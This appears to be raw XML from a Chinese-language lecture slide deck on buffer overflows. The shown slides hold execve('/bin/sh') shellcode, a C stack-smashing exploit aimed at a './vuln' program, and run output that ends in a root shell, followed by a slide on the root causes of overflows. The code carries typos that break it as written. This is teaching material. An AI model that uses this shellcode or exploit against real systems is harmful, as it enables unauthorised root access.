                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>堆栈</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23562" name="右弧形箭头 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-10491716">
            <a:off x="3322638" y="3376613"/>
            <a:ext cx="587375" cy="1054100"/>
          </a:xfrm>
          <a:prstGeom prst="curvedLeftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24983"/>
              <a:gd name="adj2" fmla="val 49974"/>
              <a:gd name="adj3" fmla="val 25000"/>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SzPct val="75000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>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endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1981655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5BDDF89E-7CB3-4E94-AD64-6433C9ED3FFC}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63492" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827088" y="1484313"/>
            <a:ext cx="7542212" cy="5035550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>#include &lt;stdlib.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Char shellcode[]=“\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8dx53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\2f\x73\x68”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Unsigned long sp(void)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>{_asm_(“movl %esp,%eax”);}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36949615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CBA3407E-01BA-40E9-B1A0-428C265AFCE3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64515" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64516" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="908050"/>
            <a:ext cx="5021262" cy="5035550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>Int main(int argc, char *argv[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Int I,offset;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Long esp,ret,*addr_ptr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Char *buffer,*ptr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Offset=0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Esp=sp();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Ret =est-offset;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Printf(“stack pointer(esp):0x%x\n”,esp);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Printf(“offset from esp:0x%x\n”,offset);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Printf(“desired return addr: 0x%x\n”,ret);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Buffer=malloc(600);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Ptr=buffer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
              <a:t>Addr_ptr=(long *)ptr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>	For (i=0;I&lt;=600;i+=4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>	{buffer[i]=ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64517" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4859338" y="1052513"/>
            <a:ext cx="3816350"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For (i=0;I&lt;=200;i++)</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{buffer[i]=“\x90”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>}</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Ptr=buffer+200;</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For (i=0;i&lt;=strlen(shellcode);i++)</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{*(ptr++)=shellcode[i];</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Buffer[600-1]=0;</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Execl(“./vuln”,”vuln”,buffer,0);</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Free(buffer);</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Return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>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42209797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DB897230-B65B-4939-AB1E-C045D854FE61}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65540" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>$gcc –o exploit exploit.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>$./exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Stack pointer(esp): 0xbffff978</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Offset from esp:0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Desired return addr:0xbffff978</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>#who am I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1889455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zh-CN" altLang="en-US" sz="3600"/>
              <a:t>缓冲区溢出的根源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639763" y="1401762"/>
            <a:ext cx="7772400" cy="4694237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>溢出的根源在于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>编程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>：如果缓冲区被写满，而程序没有去检查缓冲区边界，也没有停止接收数据，这时缓冲区溢出就会发生。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MS Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>系统由于要实现更好的性能和功能，往往在数据段中动态地放入可执行的代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C/C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>语言问题：对数组下标访问边界不做检查或者少做检查。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>程序员的编程习惯：忽略对输入数据进行严格的边界检查。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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="291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1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1843">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="291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1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1843">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="291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1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1843">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="291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1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F8EBE793-375F-4596-A6D6-1CFBE0DB628E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>基于堆的溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68612" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1057507" y="1385887"/>
            <a:ext cx="6534150" cy="5472113"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>{file *</a:t>
            </a:r>
            <a:r>
